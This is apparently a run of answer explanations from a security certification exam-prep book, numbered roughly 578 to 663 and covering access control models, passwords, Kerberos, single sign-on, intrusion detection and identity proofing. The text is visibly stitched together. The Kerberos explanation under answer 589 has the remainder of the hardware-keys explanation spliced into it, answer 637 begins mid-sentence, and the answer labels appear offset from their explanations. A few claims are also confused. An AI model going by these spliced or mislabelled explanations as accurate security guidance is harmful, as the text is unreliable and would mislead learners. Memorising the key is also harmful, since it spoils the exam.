A. The separation of duties principle is related to the “least privilege” principle; that is, users and processes in a system should have the least number of privileges and for the minimal period of time necessary to perform their assigned tasks. The authority and capacity to perform certain functions should be separated and delegated to different individuals. This principle is often applied to split the authority to write and approve monetary transactions between two people. It can also be applied to separate the authority to add users to a system and other system administrator duties from the authority to assign passwords, conduct audits, and perform other security administrator duties. There is no relation between the parity check, which is hardware based, and the limit check, which is a software-based application. The parity check is a check that tests whether the number of ones (1s) or zeros (0s) in an array of binary digits is odd or even. Odd parity is standard for synchronous transmission and even parity for asynchronous transmission. In the limit check, a program tests the specified data fields against defined high or low value limits for acceptability before further processing. The RSA algorithm is incorrect because it uses two keys: private and public. The DES is incorrect because it uses only one key for both encryption and decryption (secret or private key).

Answer 578

B. Password advisors are computer programs that examine user choices for passwords and inform the users if the passwords are weak. Passwords produced by password generators are difficult to remember, whereas user selected passwords are easy to guess. Users write the password down on a paper when it is assigned to them.

Answer 579

D. Authentication is providing assurance about the identity of a subject or object; for example, ensuring that a particular user is who he claims to be. A smart card system uses cryptographic-based smart tokens that offer great flexibility and can solve many authentication problems such as forgery and masquerading. A smart token typically requires a user to provide something the user knows (i.e., a PIN or password), which provides a stronger control than the smart token alone. Smart cards do not require a callback because the codes used in the smart card change frequently, which cannot be repeated. Callback systems are used to authenticate a person. A fixed callback system calls back to a known telephone associated with a known place. However, the called person may not be known, and it is a problem with masquerading. It is not only insecure but also inflexible because it is tied to a specific place. It is not applicable if the caller moves around. A variable callback system is more flexible than the fixed one but requires greater maintenance of the variable telephone numbers and locations. These phone numbers can be recorded or decoded by a hacker.

Answer 580

C. Because valuable data is stored on a smart card, the card is useless if lost, damaged, or forgotten. An unauthorized person can gain access to a computer system in the absence of other strong controls. A smart card is a credit card-sized device containing one or more integrated circuit chips, which performs the functions of a microprocessor, memory, and an input/output interface. Smart cards can be used (i) as a means of access control, (ii) as a medium for storing and carrying the appropriate data, and (iii) a combination of (1) and (2)

Answer 581

A. Login controls specify the conditions users must meet for gaining access to a computer system. In most simple and basic cases, access will be permitted only when both a username and password are provided. More complex systems grant or deny access based on the type of computer login; that is, local, dialup, remote, network, batch, or sub process. The security system can restrict access based on the type of the terminal, or the remote computer’s access will be granted only when the user or program is located at a designated terminal or remote system. Also, access can be defined by the time of day and the day of the week. As a further precaution, the more complex and sophisticated systems monitor unsuccessful logins, send messages or alerts to the system operator, and disable accounts when a break-in occurs.

Answer 582

C. A security policy is the framework within which an organization establishes needed levels of information security to achieve the desired confidentiality goals. A policy is a statement of information values, protection responsibilities, and organizational commitment for a computer system. It is a set of laws, rules, and practices that regulate how an organization manages, protects, and distributes sensitive information. There are trade-offs among controls such as technical controls and procedural controls. If technical controls are not available, procedural controls might be used until a technical solution is found. Nevertheless, technical controls are useless without procedural controls and a robust security policy. Similarly, there is a trade-off between access and confidentiality; that is, a system meeting standards for access allows authorized users access to information resources on an ongoing basis. The emphasis given to confidentiality, integrity, and access depends on the nature of the application. An individual system may sacrifice the level of one requirement to obtain a greater degree of another. For example, to allow for increased levels of availability of information, standards for confidentiality may be lowered. Thus, the specific requirements and controls for information security can vary. Passwords and controls also involve trade-offs, but at a lower level. Passwords require deciding between system-generated passwords, which can offer more security than user-generated passwords because system-generated passwords are randomly generated pseudo words not found in the dictionary. However, system-generated passwords are harder to remember, forcing users to write them down, thus defeating the purpose. Controls require selecting between a manual and automated control or selecting a combination of manual and automated controls. One control can work as a compensating control for the other.

Answer 583

C. Program library controls enable only assigned programs to run in production and eliminate the problem of test programs accidentally entering the production environment. They also separate production and testing data to ensure that no test data are used in normal production. This practice is based on the “separation of duties” principle. File placement controls ensure that files reside on the proper direct access storage device so that data sets do not go to a wrong device by accident. Data file, program, and job naming conventions implement the separation of duties principle by uniquely identifying each production and test data file names, program names, job names, and terminal usage.

Answer 584

B. Users take on assigned roles such as doctor, nurse, teller, and manager. With role-based access control mechanism, access decisions are based on the roles that individual users have as part of an organization, that is, job duties. Job enlargement means adding width to a job; job enrichment means adding depth to a job; and job rotation makes a person well rounded.

Answer 585

C. Salting is the inclusion of a random value in the password hashing process that greatly decreases the likelihood of identical passwords returning the same hash. If two users choose the same password, salting can make it highly unlikely that their hashes are the same. Larger salts effectively make the use of rainbow tables infeasible. Stretching involves hashing each password and its salt thousands of times. This makes the creation of the rainbow tables correspondingly more time-consuming, while having little effect on the amount of effort needed by the organization’s systems to verify password authentication attempts. Keyspace is the large number of possible key values (keys) created by the encryption algorithm to use when transforming the message. Passphrase is a sequence of characters transformed by a password system into a virtual password. Entropy is a measure of the amount of uncertainty that an attacker faces to determine the value of a secret.

Answer 586

C. Passwords should not be included in initialization files, script files, or batch files due to possible compromise. Instead, they should be stored in a password file, preferably encrypted.

Answer 587

D. The rule-based access control (RuBAC) is based on specific rules relating to the nature of the subject and object. A RuBAC decision requires authorization information and restriction information to compare before any access is granted. Both Bell-LaPadula access control model and mandatory access control policy deals with rules. The other three choices do not deal with rules.

Answer 588

C. Hardware keys are devices that do not require a complicated process of administering user rights and access privileges. They are simple keys, similar to door keys that can be plugged into the personal computer before a person can successfully log on to access

Answer 589

A. The primary goal of Kerberos is to prevent system users from claiming the identity of other users in a distributed computing environment. The Kerberos authentication system is based on secret key cryptography. The Kerberos protocol provides strong authentication of users and host computer systems. Further, Kerberos uses a trusted third party to manage the cryptographic keying relationships, which are critical to the authentication process. System users have a significant degree of control over the workstations used to access network services, and these workstations must therefore be considered not trusted. Kerberos was developed to provide distributed network authentication services involving client/server systems. A primary threat in this type of client/server system is the possibility that one user claims the identity of another user (impersonation), thereby gaining access to system services without the proper authorization. To protect against this threat, Kerberos provides a trusted third party accessible to network entities, which supports the services required for authentication between these entities. This trusted third party is known as the Kerberos key distribution server, which shares secret cryptographic keys with each client and server within a particular realm. The Kerberos authentication model is based upon the presentation of cryptographic tickets to prove the identity of clients requesting services from a host system or server. The other three choices are incorrect because they cannot reduce the risk of impersonation. For example: (i) passwords can be shared, guessed, or captured and (ii) memory tokens and smart tokens can be lost or stolen. Also, these three choices do not use a trusted third party to strengthen controls as Kerberos does controlled data files and programs. Each user gets a set of keys for his personal use. Hardware keys are simple to use and easy to administer. Passwords is an incorrect answer because they do require some amount of security administrative work such as setting up the account and helping users when they forget passwords. Passwords are simple to use but hard to administer. Cryptographic tokens is an incorrect answer because they do require some amount of security administrative work. Tokens need to be assigned, programmed, tracked, and disposed of. Encrypted data files is an incorrect answer because they do require some amount of security administrative work. Encryption keys need to be assigned to the owners for encryption and decryption purposes.

Answer 590

C. Kerberos is an authentication system with encryption mechanisms that make network traffic secure. Weaknesses of Kerberos include (i) it is subject to dictionary attacks where passwords can be stolen by an attacker and (ii) it requires modification of all network application source code, which is a problem with vendor developed applications with no source code provided to users. Kerberos strengths include that it can be added to an existing security system and that it makes intercepting and analyzing network traffic difficult. This is due to the use of encryption in Kerberos.

Answer 591

C. Impersonation attacks involving the use of physical keys and biometric checks are less likely due to the need for the network attacker to be physically near the biometric equipment. Passwords and account names are incorrect because they are the most common way to initiate impersonation attacks on the network. A firewall is a mechanism to protect IT computing sites against Internet-borne attacks. Most digital certificates are password-protected and have an encrypted file that contains identification information about its holder.

Answer 592

A. Kerberos is a de facto standard for an authentication protocol, providing a robust authentication method. Kerberos was developed to enable network applications to securely identify their peers and can be used for local/remote logins, remote execution, file transfer, transparent file access (i.e., access of remote files on the network as though they were local) and for client/server requests. The Kerberos system includes a Kerberos server, applications which use Kerberos authentication, and libraries for use in developing applications which use Kerberos authentication. In addition to secure remote procedure call (Secure RPC), Kerberos prevents impersonation in a network environment and only provides authentication services. Other services such as confidentiality, integrity, and availability must be provided by other means. With Kerberos and secure RPC, passwords are not transmitted over the network in plaintext. In Kerberos two items need to prove authentication. The first is the ticket and the second is the authenticator. The ticket consists of the requested server name, the client name, the address of the client, the time the ticket was issued, the lifetime of the ticket, the session key to be used between the client and the server, and some other fields. The ticket is encrypted using the server’s secret key and thus cannot be correctly decrypted by the user. If the server can properly decrypt the ticket when the client presents it and if the client presents the authenticator encrypted using the session key contained in the ticket, the server can have confidence in the user’s identity. The authenticator contains the client name, address, current time, and some other fields. The authenticator is encrypted by the client using the session key shared with the server. The authenticator provides a time-validation for the credential. If a user possesses both the proper credential and the authenticator encrypted with the correct session key and presents these items within the lifetime of the ticket, then the user’s identity can be authenticated. Confidentiality is incorrect because it ensures that data is disclosed to only authorized subjects. Integrity is incorrect because it is the property that an object is changed only in a specified and authorized manner. Availability is incorrect because it is the property that a given resource will be usable during a given time period

Answer 593

B. Under a single sign-on (SSO), a user can authenticate once to gain access to multiple applications that have been previously defined in the security system. The SSO system is convenient for the end user in that it provides fewer areas to manage when compared to multiple sign-on systems, but SSO is risky. Many points of failure exist in multiple sign-on systems as they are inconvenient for the end user because of many areas to manage.

Answer 594

B. In a playback (replay) attack, messages received from something or from somewhere are replayed back to it. It is also called a reflection attack. Kerberos puts the time of day in the request to prevent an eavesdropper from intercepting the request for service and retransmitting it from the same host at a later time. A tunneling attack attempts to exploit a weakness in a system that exists at a level of abstraction lower than that used by the developer to design the system. For example, an attacker might discover a way to modify the microcode of a processor used when encrypting some data, rather than attempting to break the system’s encryption algorithm. Destructive attacks damage information in a fashion that denies service. These attacks can be prevented by restricting access to critical data files and protecting them from unauthorized users. In process attacks, one user makes a computer unusable for others that use the computer at the same time. These attacks are applicable to shared computers.

Answer 595

C. History-based access control policies are defined in terms of subjects and events where the events of the system are specified as the object access operations associated with activity at a particular security level. This assumes that the security policy is defined in terms of the sequence of events over time, and that the security policy decides which events of the system are permitted to ensure that information does not flow in an unauthorized manner. History-based access control policies are not based on standard access control mechanism but based on practical applications. In the history-based access control policies, previous access events are used as one of the decision factors for the next access authorization. The workflow and the Chinese Wall policies are examples of history-based access control policies.

Answer 596

C. The access control list (ACL) is the most useful and flexible type of implementation of an access control matrix. The ACL permits any given user to be allowed or disallowed access to any object. The columns of an ACL show a list of users attached to protected objects. One can associate access rights for individuals and resources directly with each object. The other three choices require extensive administrative work and are useful but not that flexible.

Answer 597

B. Kerberos was developed to enable network applications to securely identify their peers. It uses a ticket, which identifies the client, and an authenticator that serves to validate the use of that ticket and prevent an intruder from replaying the same ticket to the server in a future session. A ticket is valid only for a given time interval. When the interval ends, the ticket expires, and any later authentication exchanges require a new ticket. An access-oriented protection system can be based on hardware or software or a combination of both to prevent and detect unauthorized access and to permit authorized access. In list-oriented protection systems, each protected object has a list of all subjects authorized to access it. A lock-and-key-oriented protection system involves matching a key or password with a specific access requirement. The other three choices do not provide a strong authentication protection, as does the Kerberos.

Answer 598

B. Administrators should check the intrusion detection and prevention system (IDPS) thresholds and alert settings to determine whether they need to be adjusted periodically to compensate for changes in the system environment and changes in threats. The other three choices are incorrect because the anomaly-based detection does not use whitelists, blacklists, and program code viewing.

Answer 599

C. An intrusion detection system (IDS) cannot act as a “silver bullet,” compensating for weak identification and authentication mechanisms, weaknesses in network protocols, or lack of a security policy. IDS can do the other three choices, such as recognizing and reporting alterations to data files, tracing user activity from the point of entry to the point of exit or impact, and interpreting the mass of information contained in operating system logs and audit trail logs.

Answer 600

C. Intrusion detection systems (IDS) can recognize when a known type of attack is perpetrated on a system. However, IDS cannot do the following: (i) analyze all the traffic on a busy network, (ii) compensate for receiving faulty information from system sources, (iii) always deal with problems involving packet-level attacks (e.g., an intruder using fabricated packets that elude detection to launch an attack or multiple packets to jam the IDS itself), and (iv) deal with high-speed asynchronous transfer mode networks that use packet fragmentation to optimize bandwidth.

Answer 601

B. Access control software can be enabled or disabled, meaning security function can be turned on or off. When disabled, the logging function does not work. The other three choices are somewhat risky but not as much as enabled or disabled.

Answer 602

A. If audit records showing trails have been designed and implemented to record appropriate information, they can assist in intrusion detection. Usually, audit records contain pertinent data (e.g., date, time, status of an action, user IDs, and event ID), which can help in intrusion detection. Access control lists refer to a register of users who have been given permission to use a particular system resource and the types of access they have been permitted. Security clearances are associated with a subject (e.g., person and program) to access an object (e.g., files, libraries, directories, and devices). Host-based authentication grants access based upon the identity of the host originating the request, instead of the identity of the user making the request. The other three choices have no facilities to record access activity and therefore cannot assist in intrusion detection.

Answer 603

B. Anomaly detectors identify abnormal, unusual behavior (anomalies) on a host or network. In threshold detection measures, certain attributes of user and system behavior are expressed in terms of counts, with some level established as permissible. Such behavior attributes can include the number of files accessed by a user in a given period of time. Statistical measures include parametric and nonparametric. In parametric measures the distribution of the profiled attributes is assumed to fit a particular pattern. In the nonparametric measures the distribution of the profiled attributes is “learned” from a set of historical data values, observed over time. Rule-based measures are similar to nonparametric statistical measures in that observed data defines acceptable usage patterns but differs in that those patterns are specified as rules, not numeric quantities.

Answer 604

A. An ATM customer can stand within three feet of a camera that automatically locates and scans the iris in the eye. The scanned bar code is then compared against previously stored code in the bank’s file. Iris-detection technology is far superior for accuracy compared to the accuracy of voice, face, hand, and fingerprint identification systems. Iris technology does not require a PIN.

Answer 605

C. Biometrics tends to be the most expensive and most secure. In general, passwords are the least expensive authentication technique and generally the least secure. Memory tokens are less expensive than smart tokens but have less functionality. Smart tokens with a human interface do not require reading equipment but are more convenient to use.

Answer 606

D. If a one-way method is used to authenticate the initiator (typically a road warrior) to the responder (typically an IPsec gateway), a digital signature is used to authenticate the responder to the initiator. One-way authentication, such as one-time passwords or digital certificates on tokens is well suited for road warrior usage, whereas mutual authentication is preferable for environments at high risk of identity spoofing, such as wireless networks.

Answer 607

C. Both users and the system can initiate session lock mechanisms. However, a session lock is not a substitute for logging out of the information system because it is done at the end of the workday. Previous logon notification occurs at the time of login. Concurrent session control deals with either allowing or not allowing multiple sessions at the same time. Session termination can occur when there is a disconnection of the telecommunications link or other network operational problems.

Answer 608

D. Identity thieves get personal information by stealing records or information while they are on the job, bribing an employee who has access to these records, hacking electronic records, and conning information out of employees. Sources of personal information include the following: Dumpster diving, which includes rummaging through personal trash, a business’ trash, or public trash dumps. Skimming includes stealing credit card or debit card numbers by capturing the information in a data storage device. Phishing and pretexting deal with stealing information through e-mail or phone by posing as legitimate companies and claiming that you have a problem with your account. This practice is known as phishing online or pretexting (social engineering) by phone respectively.

Answer 609

C. Pass-through authentication refers to passing operating system credentials (e.g., username and password) unencrypted from the operating system to the application system. This is risky due to unencrypted credentials. Note that pass-through authentications can be encrypted or unencrypted. External authentication is incorrect because it uses a directory server, which is not risky. Proprietary authentication is incorrect because username and passwords are part of the application, not the operating system. This is less risky. Host/user authentication is incorrect because it is performed within a controlled environment (e.g., managed workstations and servers within an organization). Some applications may rely on previous authentication performed by the operating system. This is less risky.

Answer 610

C. An inference attack is where a user or an intruder can deduce information to which he had no privilege from information to which he has privilege.

Answer 611

D. In an out-of-band attack, the attack is against an authentication protocol run where the attacker assumes the role of a subscriber with a genuine verifier or relying party. The attacker obtains secret and sensitive information such as passwords and account numbers and amounts when a subscriber manually enters them into a one-time password device or confirmation code sent to the verifier or relying party. In an out-of-band attack, the attacker alters the authentication protocol channel through session hijacking, verifier impersonation, or man-in the-middle (MitM) attacks. In a verifier impersonation attack, the attacker impersonates the verifier and induces the claimant to reveal his secret token. The MitM attack is an attack on the authentication protocol run in which the attacker positions himself in between the claimant and verifier so that he can intercept and alter data traveling between them. In a password guessing attack, an impostor attempts to guess a password in repeated logon trials and succeeds when he can log onto a system. In a replay attack, an attacker records and replays some part of a previous good protocol run to the verifier. Both password guessing and replay attacks are examples of in-band attacks. In an in-band attack, the attack is against an authentication protocol where the attacker assumes the role of a claimant with a genuine verifier or actively alters the authentication channel. The goal of the attack is to gain authenticated access or learn authentication secrets.

Answer 612

A. Access control requires a cross-cutting approach because it is related to access control, incident response, audit and accountability, and configuration management control families (areas). Cross-cutting means a control in one area affects the controls in other-related areas. The other three choices require a control-specific approach.

Answer 613

A. Cryptography, which is a part of technical control, ensures the confidentiality goal. The other three choices are part of user identification and authentication controls, which are also a part of technical control.

Answer 614

C. Reconstruction of transactions is a part of audit trail mechanisms. The other three choices are a part of authorization and access controls.

Answer 615

A. Performance-based policy is used to evaluate an employee’s performance annually or other times. The other three choices are examples of an access control policy where they control access between users and objects in the information system.

Answer 616

D. It is difficult to meet the security and safety requirements with flexible access control policies expressed in implicit constraints such as role-based access control (RBAC) and rule-based access control (RuBAC). Static separation-of-duty constraints require that two roles of an individual must be mutually exclusive, constraints must reduce the chances of collusion, and constraints must minimize the conflict of-interest in task assignments to employees.

Answer 617

A. A single sign-on (SSO) technology allows a user to authenticate once and then access all the resources the user is authorized to use. A reduced sign-on (RSO) technology allows a user to authenticate once and then access many, but not all, of the resources the user is authorized to use. Hence, SSO and RSO perform similar functions. The other three choices do not perform similar functions. Data encryption standard (DES) is a symmetric cipher encryption algorithm. Domain name system (DNS) provides an Internet translation service that resolves domain names to Internet Protocol (IP) addresses and vice versa. Address resolution protocol (ARP) is used to obtain a node’s physical address. Point-to-point protocol (PPP) is a data-link framing protocol used to frame data packets on point-to-point lines. Serial line Internet protocol (SLIP) carries Internet Protocol (IP) over an asynchronous serial communication line. PPP replaced SLIP. Simple key management for Internet protocol (SKIP) is designed to work with the IPsec and operates at the network layer of the TCP/IP protocol, and works very well with sessionless datagram protocols.

Answer 618

D. Identification is the process used to recognize an entity such as a user, program, process, or device. It is performed first, and authentication is done next. Identification and authentication are not the same. Identification requires a user ID, and authentication requires a password.

Answer 619

B. Accountability is typically accomplished by identifying and authenticating system users and subsequently tracing their actions through audit trails (i.e., auditing).

Answer 620

D. Mandatory access control is expensive and causes system overhead, resulting in reduced system performance of the database. Mandatory access control uses sensitivity levels and security labels. Discretionary access controls use tags.

Answer 621

D. The purpose of auditors reviewing access controls and logs is to find out whether employees follow security policies and access rules, and to detect any violations and anomalies. The audit report helps management to improve access controls.

Answer 622

A. A management official responsible for a particular application system, subsystem, or group of systems develops the security policy. The development of an access control policy may not be an easy endeavor. User-friendliness should receive the highest interest because the system is designed for users, and the system usage is determined by whether the system is user-friendly. The other three choices have a competing interest in a security policy, but they are not as important as the user-friendliness issue. An example of a security principle is “least privilege.”

Answer 623

A. A password-generating program can produce passwords in a random fashion, rather than relying on user-selected ones. System generated passwords are usually hard to remember, forcing users to write them down. This defeats the whole purpose of stronger passwords. Encrypted passwords protect from unauthorized viewing or using. The encrypted password file is kept secure with access permission given to security administration for maintenance or to the passwords system itself. This approach is productive in keeping the passwords secure and secret. Non reusable passwords are used only once. A series of passwords are generated by a cryptographic secure algorithm and given to the user for use at the time of login. Each password expires after its initial use and is not repeated or stored anywhere. This approach is productive in keeping the passwords secure and secret. In time-based passwords, the password changes every minute or so. A smart card displays some numbers that are a function of the current time and the user’s secret key. To get access, the user must enter a number based on his own key and the current time. Each password is a unique one and therefore need not be written down or guessed. This approach is productive and effective in keeping the passwords secure and secret.

Answer 624

A. The largest risk exposure remains with employees. Personnel security measures are aimed at hiring honest, competent, and capable employees. Job requirements need to be programmed into the logical access control software. Policy is also closely linked to personnel issues. A deterrent effect arises among employees when they are aware that their misconduct (intentional or unintentional) may be detected. Selecting the right type and access level for employees, informing which employees need access accounts and what type and level of access they require, and informing changes to access requirements are also important. Accounts and accesses should not be granted or maintained for employees who should not have them in the first place. The other three choices are distantly related to logical access controls when compared to employee issues.

Answer 625

C. Cognitive passwords use fact-based and opinion-based cognitive data as a basis for user authentication. It uses interactive software routines that can handle initial user enrollment and subsequent cue response exchanges for system access. Cognitive passwords are based on a person’s lifetime experiences and events where only that person, or his family, knows about them. Examples include the person’s favorite high school teachers’ names, colors, flowers, foods, and places. Cognitive password procedures do not depend on the “people memory” often associated with the conventional password dilemma. However, implementation of a cognitive password mechanism could cost money and take more time to authenticate a user. Cognitive passwords are easier to recall and difficult for others to guess. Conventional (static) passwords are difficult to remember whether user-created or system-generated and are easy to guess by others. Dynamic passwords change each time a user signs on to the computer. Even in the dynamic password environment, a user needs to remember an initial code for the computer to recognize him. Conventional passwords are reusable whereas dynamic ones are not. Conventional passwords rely on memory.

Answer 626

A. Passphrases have the virtue of length (e.g., up to 80 characters), making them both difficult to guess and burdensome to discover by an exhaustive trial-and-error attack on a system. The number of characters used in the other three choices is smaller (e.g., four to eight characters) than passphrases. All four security codes are user identification mechanisms. Passwords are uniquely associated with a single user. Lock words are system-generated terminal passwords shared among users. Passcodes are a combination of password and ID card.

Answer 627

C. Anomaly detection approaches often require extensive training sets of system event records to characterize normal behavior patterns. Skill sets are also important for the IT security analyst. Tool sets and data sets are not relevant here because the tool sets may contain software or hardware, and the data sets may contain data files and databases.

Answer 628

B. A security label is a marking bound to a resource (which may be a data unit) that names or designates the security attributes of that resource. A security tag is an information unit containing a representation of certain security-related information (e.g., a restrictive attribute bitmap). A security level is a hierarchical indicator of the degree of sensitivity to a certain threat. It implies, according to the security policy enforced, a specific level of protection. A security attribute is a security-related quality of an object. Security attributes may be represented as hierarchical levels, bits in a bitmap, or numbers. Compartments, caveats, and release markings are examples of security attributes.

Answer 629

C. The greatest problem with temporary access is that once temporary access is given to an employee, it is not reverted back to the previous status after the project has been completed. This can be due to forgetfulness on both sides of employee and employer or the lack of a formal system for change notification. There can be a formal system of change notification for permanent access, and guest or contractor accesses are removed after the project has been completed.

Answer 630

A. Discretionary access controls deal with the concept of control objectives, or control over individual aspects of an enterprise’s processes or resources. They are based on the identity of the users and of the objects they want to access. Discretionary access controls are implemented by one user or the network/system administrator to specify what levels of access other users are allowed to have. Mandatory access controls are implemented based on the user’s security clearance or trust level and the particular sensitivity designation of each file. The owner of a file or object has no discretion as to who can access it. An access control list is based on which user can access what objects. Logical access controls are based on a user-supplied identification number or code and password. Discretionary access control is by group association whereas mandatory access control is by sensitivity level.

Answer 631

B. Discretionary access control offers a finer level of granularity in the access control process. Mandatory access controls can provide access to broad categories of information, whereas discretionary access controls can be used to fine-tune those broad controls, override mandatory restrictions as needed, and accommodate special circumstances.

Answer 632

D. Several infrastructures are devoted to providing identities and the means of authenticating those identities. Examples of these infrastructures include the X.509 authentication framework, the Internet Engineering Task Force’s PKI (IETF’s PKI), the secure domain name system (DNS) initiatives, and the simple public key infrastructure (SPKI).

Answer 633

A. The best control for protecting sensitive files is using mandatory access controls supplemented by discretionary access controls and implemented through the use of an access control list. A complementary mandatory access control mechanism can prevent the Trojan horse attack that can be allowed by the discretionary access control. The mandatory access control prevents the system from giving sensitive information to any user who is not explicitly authorized to access a resource.

Answer 634

B. Mandatory access controls are the simplest to use because they can be used to grant broad access to large sets of files and to broad categories of information. Discretionary access controls are not simple to use due to their finer level of granularity in the access control process. Both the access control list and logical access control require a significant amount of administrative work because they are based on the details of each individual user.

Answer 635

A. Capabilities and profiles are used to represent the access control matrix data by row and connect accessible objects to the user. On the other hand, a protection bit-based system and access control list represents the data by column, connecting a list of users to an object.

Answer 636

A. Discretionary access control is a means of restricting access to objects based on the identity of subjects and/or groups to which they belong. In a mandatory access control mechanism, the owner of a file or object has no discretion as to who can access it. Both security control and access control are too broad and vague to be meaningful here.

Answer 637

D. passwords and is readable only by the root user. The password validation file uses the shadow password file before allowing the user to log in. The password-aging file contains an expiration date, and the password reuse file prevents a user from reusing a previously used password. The files mentioned in the other three choices are not hidden.

Answer 638

C. Workflow policy is a process that operates on rules and procedures. A workflow is specified as a set of tasks and a set of dependencies among the tasks, and the sequencing of these tasks is important (i.e., task transactions). The various tasks in a workflow are usually carried out by several users in accordance with organizational rules represented by the workflow policy. The Chinese Wall policy addresses conflict-of-interest issues, with the objective of preventing illicit flows of information that can result in conflicts of interest. The Chinese Wall policy is simple and easy to describe but difficult to implement. Both role- and rule-based access control can create conflict-of-interest situations because of incompatibility between employee roles and management rules.

Answer 639

D. A commonly used method to ensure that access to a communications session is controlled and authenticated continuously is the use of encryption mechanisms to prevent loss of control of the session through session stealing or hijacking. Other methods such as signed x.509 certificates and password files associated with access control lists (ACLs) can bind entities to unique IDs. Although these other methods are good, they do not prevent the loss of control of the session.

Answer 640

C. A computer system can be protected through a power-on password, which prevents an unauthorized user from starting an alternative operating system. The other three types of passwords mentioned do not have the preventive nature, as does the power-on password

Answer 641

A. An organization practices the concept of least privilege for specific job duties and information systems, including specific responsibilities, network ports, protocols, and services in accordance with risk assessments. These practices are necessary to adequately mitigate risk to organizations’ operations, assets, and individuals. The other three choices are specific components of access controls.

Answer 642

A. There are two primary approaches to analyzing events to detect attacks: signature detection and anomaly detection. Signature detection is the primary technique used by most commercial systems; however, anomaly detection is the subject of much research and is used in a limited form by a number of intrusion detection and prevention systems (IDPS). Behavior and statistical based IDPS are part of anomaly-based IDPS.

Answer 643

A. A passive attack is an attack against an authentication protocol where the attacker intercepts data traveling along the network between the claimant and verifier but does not alter the data. Eavesdropping is an example of a passive attack. A man-in-the-middle (MitM) attack is incorrect because it is an active attack on the authentication protocol run in which the attacker positions himself between the claimant and verifier so that he can intercept and alter data traveling between them. Impersonation is incorrect because it is an attempt to gain access to a computer system by posing as an authorized user. It is the same as masquerading, spoofing, and mimicking. Session hijacking is incorrect because it is an attack that occurs during an authentication session within a database or system. The attacker disables a user’s desktop system, intercepts responses from the application, and responds in ways that probe the session. Man-in-the middle, impersonation, and session hijacking are examples of active attacks. Note that MitM attacks can be passive or active depending on the intent of the attacker because there are mild MitM or strong MitM attacks.

Answer 644

B. Token threats include masquerading, off-line attacks, and guessing passwords. Multiple factors raise the threshold for successful attacks. If an attacker needs to steal the cryptographic token and guess a password, the work factor may be too high. Physical security mechanisms are incorrect because they may be employed to protect a stolen token from duplication. Physical security mechanisms can provide tamper evidence, detection, and response. Complex passwords are incorrect because they may reduce the likelihood of a successful guessing attack. By requiring the use of long passwords that do not appear in common dictionaries, attackers may be forced to try every possible password. System and network security controls are incorrect because they may be employed to prevent an attacker from gaining access to a system or installing malicious software (malware).

Answer 645

C. The RA may be a part of the CSP, or it may be a separate and independent entity; however a trusted relationship always exists between the RA and CSP. Either the RA or CSP must maintain records of the registration. The RA and CSP may provide services on behalf of an organization or may provide services to the public.

Answer 646

A. Spoofing is a tampering activity and is an active attack. Sniffing is a surveillance activity and is a passive attack. An exhaustive attack (i.e., brute force attack) consists of discovering secret data by trying all possibilities and checking for correctness. For a four-digit password, you might start with 0000 and move to 0001 and 0002 until 9999.

Answer 647

C. There are two general categories of threats to the registration process: impersonation and either compromise or malfeasance of the infrastructure (RAs and CSPs). Infrastructure threats are addressed by normal computer security controls such as separation of duties, record keeping, and independent audits.

Answer 648

A. Registration authorities (RAs), credential service providers (CSPs), verifiers, and relying parties are ordinarily trustworthy in the sense of being correctly implemented and not deliberately malicious. However, claimants or their systems may not be trustworthy or else their identity claims could simply be trusted. Moreover, whereas RAs, CSPs, and verifiers are normally trustworthy, they are not invulnerable and could become corrupted. Therefore, protocols that expose long term authentication secrets more than are absolutely required, even to trusted entities, should be avoided.

Answer 649

C. Employees can come and go, but their roles do not change, such as a doctor or nurse in a hospital. With role-based access control, access decisions are based on the roles that individual users have as part of an organization. Employee names may change but the roles does not. This access control is the best for organizations experiencing excessive employee turnover. Rule-based access control and mandatory access control are the same because they are based on specific rules relating to the nature of the subject and object. Discretionary access control is a means to restrict access to objects based on the identity of subjects and/or groups to which they belong.

Answer 650

C. The principle of least privilege refers to granting users only those accesses required to perform their duties. Only the concept of “appropriate privilege” is supported by the principle of least privilege.

Answer 651

B. Password management is an example of preventive controls in that passwords deter unauthorized users from accessing a system unless they know the password through some other means.

Answer 652

A. A discretionary access control (DAC) model uses access control matrix where it places the name of users (subjects) in each row and the names of objects (files or programs) in each column of a matrix. The other three choices do not use an access control matrix.

Answer 653

C. Access control mechanisms include logical (passwords and encryption), physical (keys and tokens), and administrative (forms and procedures) controls. Directive, preventive, detective, corrective, and recovery controls are controls by action. Management, operational, and technical controls are controls by nature.

Answer 654

B. Security labels and interfaces are used to determine access based on the mandatory access control (MAC) policy. A security label is the means used to associate a set of security attributes with a specific information object as part of the data structure for that object. Labels could be designated as proprietary data or public data. The other three choices do not use security labels.

Answer 655

B. Intrusion detection and prevention systems (IDPS) serve as monitoring mechanisms, watching activities, and making decisions about whether the observed events are suspicious. IDPS can spot attackers circumventing firewalls and report them to system administrators, who can take steps to prevent damage. Firewalls serve as barrier mechanisms, barring entry to some kinds of network traffic and allowing others, based on a firewall policy.

Answer 656

A. When Kerberos authentication is combined with single sign-on systems, it requires establishment of and operating the privilege servers. Kerberos uses symmetric key cryptography, and the other three choices are examples of asymmetric key cryptography.

Answer 657

B. The legal implications of using honeypot and padded cell systems are not well defined. It is important to seek guidance from legal counsel before deciding to use either of these systems.

Answer 658

B. Safety is fundamental to ensuring that the most basic of access control policies can be enforced. This enforcement is tied to the job description of an individual employee through access authorizations (e.g., permissions and privileges). Job description lists job tasks, duties, roles, and responsibilities expected of an employee, including safety and security requirements. The other three choices do not provide safety enforcements. Job rotation makes an employee well-rounded because it broadens an employee’s work experience, job enlargement adds width to a job, and job enrichment adds depth to a job.

Answer 659

C. Identification comes before authentication, and authorization comes after authentication. Accountability is last where user actions are recorded.

Answer 660

B. The principle of least privilege deals with access control authorization mechanisms, and as such the principle ensures integrity of data and systems by limiting access to data/information and information systems.

Answer 661

D. A major vulnerability with the Kerberos model is that if the key distribution server is attacked, every secret key used on the network is compromised. The principals involved in the Kerberos model include the user, the client, the key-distribution-center, the ticket-granting service, and the server providing the requested services.

Answer 662

C. Identity proofing is the process by which a credential service provider (CSP) and a registration authority (RA) validate sufficient information to uniquely identify a person. A certification authority (CA) is not involved in identity proofing. A CA is a trusted entity that issues and revokes public key certificates. A certificate revocation list (CRL) is not involved in identity proofing. A CRL is a list of revoked public key certificates created and digitally signed by a CA.

Answer 663

B. A lattice security model is based on a nondiscretionary access control (non-DAC) model. A lattice model is a partially ordered set for which every pair of elements (subjects and objects) has a greatest lower bound and a least upper bound. The subject has the greatest lower bound, and the object has the least upper bound.

Answer 664

